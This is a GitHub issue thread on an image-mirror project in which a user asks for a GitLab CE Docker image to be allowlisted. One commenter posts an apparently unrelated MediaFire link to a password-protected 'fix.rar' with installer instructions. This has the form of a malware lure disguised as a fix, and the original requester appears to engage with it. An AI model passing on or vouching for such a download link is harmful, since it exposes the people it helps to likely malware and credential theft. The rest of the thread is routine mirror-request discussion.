### ISSUE TITLE
gitlab/gitlab-ce:17.1.4-ce.0

### ISSUE THREAD

**Issue by fkzzxyx123** [DaoCloud/public-image-mirror#26798]
### 白名单级别

只需要这一个镜像 (如 docker.io/library/busybox)

### 镜像仓库地址

gitlab/gitlab-ce:17.1.4-ce.0

### 这是 **镜像仓库** 认证可信的 **验证过的发布者(Verified Publisher)**或者**赞助的项目(Sponsored OSS)** 么?

不是 - 请补充下面的信息

### 项目源码地址 或 组织地址

docker pull gitlab/gitlab-ce:17.1.4-ce.0

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by fkzzxyx123** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

hello, what is username?

**Comment by fkzzxyx123** [comment]
I can`t download this images

**Comment by wzshiming** [comment]
What is the error message when using? this image is have been in allowlist.
